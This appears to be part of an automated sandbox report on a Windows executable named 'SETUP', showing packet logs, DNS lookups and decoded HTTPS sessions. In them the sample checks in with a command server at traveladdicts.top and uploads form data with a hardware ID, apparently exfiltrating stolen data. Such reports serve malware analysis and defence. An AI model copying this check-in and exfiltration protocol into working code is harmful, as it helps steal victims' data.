                                                                                                                                                Jan 28, 2025 16:13:05.105535030 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.105549097 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.572407961 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.572468996 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.573798895 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.573803902 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.574006081 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:05.575083971 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.575232983 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:05.575257063 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.318743944 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.318943024 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:21.319001913 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:21.319134951 CET49234443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:21.319149971 CET44349234172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:22.581994057 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582036972 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:22.582118034 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582518101 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:22.582540989 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.199892998 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.199996948 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.201661110 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.201687098 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.201937914 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.203213930 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.203923941 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.203962088 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.204063892 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.204102993 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.204973936 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205020905 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205168009 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205216885 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205368042 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205394030 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205539942 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205571890 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205586910 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205598116 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205673933 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205702066 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.205744982 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205838919 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.205877066 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.215692043 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.215924025 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.215959072 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:23.215982914 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.216010094 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.216049910 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:23.221043110 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858297110 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858417034 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.858481884 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.858705044 CET49235443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.858728886 CET44349235172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.979985952 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980010986 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:35.980110884 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980469942 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:35.980489016 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.459238052 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.459363937 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.460798025 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.460813046 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.461050034 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:36.462338924 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.462338924 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:36.462414026 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219438076 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219542027 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.219680071 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220115900 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220136881 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.220211983 CET49236443192.168.2.9172.67.202.141
                                                                                                                                                Jan 28, 2025 16:13:37.220217943 CET44349236172.67.202.141192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.238804102 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.238842964 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.238913059 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.239265919 CET49237443192.168.2.9104.26.3.16
                                                                                                                                                Jan 28, 2025 16:13:37.239284039 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.707854033 CET44349237104.26.3.16192.168.2.9
                                                                                                                                                Jan 28, 2025 16:13:37.708029032 CET49237443192.168.2.9104.26.3.16
Jan 28, 2025 16:13:37.710069895 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.710082054 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.710341930 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.711605072 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.755346060 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968720913 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968766928 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968796968 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968828917 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968914986 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.968944073 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.968944073 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.968966961 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.969304085 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.969325066 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Jan 28, 2025 16:13:37.969356060 CET | 49237 | 443 | 192.168.2.9 | 104.26.3.16
Jan 28, 2025 16:13:37.969362020 CET | 443 | 49237 | 104.26.3.16 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2025 16:12:22.474807978 CET | 58207 | 53 | 192.168.2.9 | 1.1.1.1
Jan 28, 2025 16:12:22.800164938 CET | 53 | 58207 | 1.1.1.1 | 192.168.2.9
Jan 28, 2025 16:12:40.183718920 CET | 53 | 54416 | 162.159.36.2 | 192.168.2.9
Jan 28, 2025 16:12:40.672992945 CET | 59093 | 53 | 192.168.2.9 | 1.1.1.1
Jan 28, 2025 16:12:40.679986000 CET | 53 | 59093 | 1.1.1.1 | 192.168.2.9
Jan 28, 2025 16:12:49.473658085 CET | 63126 | 53 | 192.168.2.9 | 1.1.1.1
Jan 28, 2025 16:12:49.488425016 CET | 53 | 63126 | 1.1.1.1 | 192.168.2.9
Jan 28, 2025 16:13:37.229583025 CET | 54219 | 53 | 192.168.2.9 | 1.1.1.1
Jan 28, 2025 16:13:37.237689972 CET | 53 | 54219 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 28, 2025 16:12:22.474807978 CET | 192.168.2.9 | 1.1.1.1 | 0xedd4 | Standard query (0) | traveladdicts.top | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:12:40.672992945 CET | 192.168.2.9 | 1.1.1.1 | 0xdb27 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 28, 2025 16:12:49.473658085 CET | 192.168.2.9 | 1.1.1.1 | 0xd567 | Standard query (0) | traveladdicts.top | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:13:37.229583025 CET | 192.168.2.9 | 1.1.1.1 | 0xc72c | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 28, 2025 16:12:22.800164938 CET | 1.1.1.1 | 192.168.2.9 | 0xedd4 | No error (0) | traveladdicts.top | | 172.67.202.141 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:12:22.800164938 CET | 1.1.1.1 | 192.168.2.9 | 0xedd4 | No error (0) | traveladdicts.top | | 104.21.60.241 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:12:40.679986000 CET | 1.1.1.1 | 192.168.2.9 | 0xdb27 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 28, 2025 16:12:49.488425016 CET | 1.1.1.1 | 192.168.2.9 | 0xd567 | No error (0) | traveladdicts.top | | 172.67.202.141 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:12:49.488425016 CET | 1.1.1.1 | 192.168.2.9 | 0xd567 | No error (0) | traveladdicts.top | | 104.21.60.241 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:13:37.237689972 CET | 1.1.1.1 | 192.168.2.9 | 0xc72c | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:13:37.237689972 CET | 1.1.1.1 | 192.168.2.9 | 0xc72c | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
Jan 28, 2025 16:13:37.237689972 CET | 1.1.1.1 | 192.168.2.9 | 0xc72c | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false
• traveladdicts.top
• rentry.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49805 | 172.67.202.141 | 443 | 7772 | C:\Users\user\Desktop\𝙎𝙀𝙏𝙐𝙋.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:12:23 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: traveladdicts.top
2025-01-28 15:12:23 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2025-01-28 15:12:35 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:12:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=1e8e509h8ptm85nk04pcq5mcm9; expires=Sat, 24 May 2025 08:59:14 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04xbUd0ysAc4XsqaUYVb8w12kbt5WdLWeqlvrSvvSGddExLYcxHMB4c0sxpBLzFJ3Xik5c%2Beo7awp09y%2FHYlH3vjzaOVFg1urkvMJ02SAbk9XE8aIn1ikOYG0CLbxOJ3poATag%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091eba32f184303-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=1959&rtt_var=786&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1490556&cwnd=219&unsent_bytes=0&cid=cd7ab68711b2a6f6&ts=11958&x=0"
2025-01-28 15:12:35 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2025-01-28 15:12:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49882 | 172.67.202.141 | 443 | 7772 | C:\Users\user\Desktop\𝙎𝙀𝙏𝙐𝙋.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-28 15:12:35 UTC | 265 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 49
    Host: traveladdicts.top
2025-01-28 15:12:35 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl2yan1&j=
2025-01-28 15:12:36 UTC | 1133 | IN | HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:12:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=s01suab9v85ia1m6qs5lj4u8qs; expires=Sat, 24 May 2025 08:59:15 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=46rFdxah2xVEkxqwp8jMXNBGq9HXl%2FiKYXab%2Bw8RtfPfmyvDLpv33TQZ6EhdNB3vMlnPRM8Dcb4ZvuV%2BdoV0pFUHOqYGnQyB9t%2BjUX0ywuGSf%2Bqq258atqSY8VonIAxYxcqKkg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091ebefbd3a8c29-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1824&rtt_var=695&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1563169&cwnd=189&unsent_bytes=0&cid=4fa1ec4b84de33f5&ts=494&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.9  49891        172.67.202.141  443               7772  C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-28 15:12:37 UTC  281                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=4R91O26XP53ONV79
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12835
    Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:37 UTC12835OUTData Raw: 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 52 39 31 4f 32 36 58 50 35 33 4f 4e 56 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --4R91O26XP53ONV79Content-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--4R91O26XP53ONV79Content-Disposition: form-data; name="pid"2--4R91O26XP53ONV79Content-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
2025-01-28 15:12:49 UTC  1140               IN         HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:12:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=t7smeis1e15g8btugg61s11n1n; expires=Sat, 24 May 2025 08:59:27 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YMuuqFMC18bJPW04h5xk%2BsEvmv6fn2P39cRo00MBc%2FaVLB%2BnWP7Ta3AG%2BJ5NtcYjSsYNEYxclG8qh%2BP8BOctSmxot9F3s2pOWrqwkkjgMX7ClxuX9Yo5Pz6fYoUTSfWz%2BV01XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091ebf85bd042d7-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1575&rtt_var=625&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13774&delivery_rate=1703617&cwnd=246&unsent_bytes=0&cid=7c82b271dc9a645b&ts=12159&x=0"
2025-01-28 15:12:49 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-28 15:12:49 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.9  49224        172.67.202.141  443               7772  C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-28 15:12:49 UTC  278                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6TPX6EWWU8QLG
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15035
    Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:12:49 UTC15035OUTData Raw: 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55 38 51 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 36 54 50 58 36 45 57 57 55
                                                                                                                                                Data Ascii: --6TPX6EWWU8QLGContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--6TPX6EWWU8QLGContent-Disposition: form-data; name="pid"2--6TPX6EWWU8QLGContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--6TPX6EWWU
2025-01-28 15:13:01 UTC  1129               IN         HTTP/1.1 200 OK
    Date: Tue, 28 Jan 2025 15:13:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=oq6f614kg1k0eltc100k5j39sg; expires=Sat, 24 May 2025 08:59:40 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BmeAnuwbvSBOHR3ScGOIFiooJ7CEUAVekDDVTM5pK2pT8WbgIdrAKn7iFcfCjmQXpamyv6Ap11DVEfZu0UNTaGnHiKy4PEqMPtRjZ9EeZq6NAew29cEOi4N8BIUOwNqHx5anQ%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9091ec48ce39333c-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1996&rtt_var=750&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15971&delivery_rate=1457085&cwnd=32&unsent_bytes=0&cid=f388171507508da0&ts=12009&x=0"
2025-01-28 15:13:01 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-28 15:13:01 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.9  49233        172.67.202.141  443               7772  C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-28 15:13:02 UTC  281                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ENY5G9P6AN86O47W
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20569
    Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:02 UTC15331OUTData Raw: 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 4e 59 35 47 39 50 36 41 4e 38 36 4f 34 37 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --ENY5G9P6AN86O47WContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--ENY5G9P6AN86O47WContent-Disposition: form-data; name="pid"3--ENY5G9P6AN86O47WContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
                                                                                                                                                2025-01-28 15:13:02 UTC5238OUTData Raw: 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
